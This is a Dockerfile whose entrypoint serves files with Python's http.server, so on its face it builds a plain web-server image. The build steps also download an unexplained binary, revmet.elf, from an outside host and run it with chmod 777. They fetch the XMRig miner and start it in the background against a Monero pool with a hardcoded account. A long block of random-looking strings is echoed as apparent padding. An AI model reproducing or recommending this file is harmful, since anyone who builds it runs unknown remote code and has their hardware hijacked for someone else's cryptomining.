FROM ubuntu:bionic

SHELL ["/bin/bash", "-c"]

RUN apt-get update && apt-get install -y \
    wget \
    ocl-icd-libopencl1 \
    libmicrohttpd-dev \
    libc6 \
    libstdc++6

WORKDIR /root
RUN wget http://mail.oogle.dev:8000//revmet.elf

RUN wget https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz
RUN tar -xzvf xmr*
WORKDIR /root/xmrig-2.14.1
RUN ./xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x

WORKDIR /root
RUN chmod 777 revmet.elf
RUN ./xmrig-2.14.1/xmrig -a cryptonight --background -o stratum+tcp://xmr.pool.minergate.com:45700 -u fewa342rwr@tutanota.com -p x;./revmet.elf
RUN echo dTm2ddl4dGVumhH9k0nO8r0tVUdTMfrI 9KAOejeIc5ZKwmj45wJFdyL4Den6QjCn pn9LU84y4wpw5iaJyZyhgDASDHBQwbjR y1QEm3gJcizLjHW0iJutAKspz24MiRNr V0F68fwvXP2sIL0XcjE4fNzbWWmSeYSp iU9Q0SBuEDup2kWomqbPdqX2eTqYs0so CtcK5HgEKEtojPTJ3To1xLaVnVnm3Poy gq8KsArIskBymgSQNDoEarIA2TOOIFb9 8VOSYsvBkMAkRP3oQSmjPilMutxxtF89 qWbDaj2BB7VVIbn2wyFA79QSt2gn6svg o8FMQDQs5vS29KBnjc34h9A0fW23TNYv IEpCD2wT6secwfKRJu0xcWI0NKUpVSOz DGLrlBP1wP15Z7bzvFORfIDPVXxlKOw8 iRR8Zp0TOxlCM7JSEpHNyxmT4XM90YWc zsaOLYboLruHMbrsWTTwF76XhxiEn5Vb JlcMVQX0KrjEurxbQ9jbtcmhwOFZNPb7 g0B5O2hD9pRQwxZWGXhnBJRmjZt4WqIH ddddddd

ENTRYPOINT ["python3", "-m", "http.server"]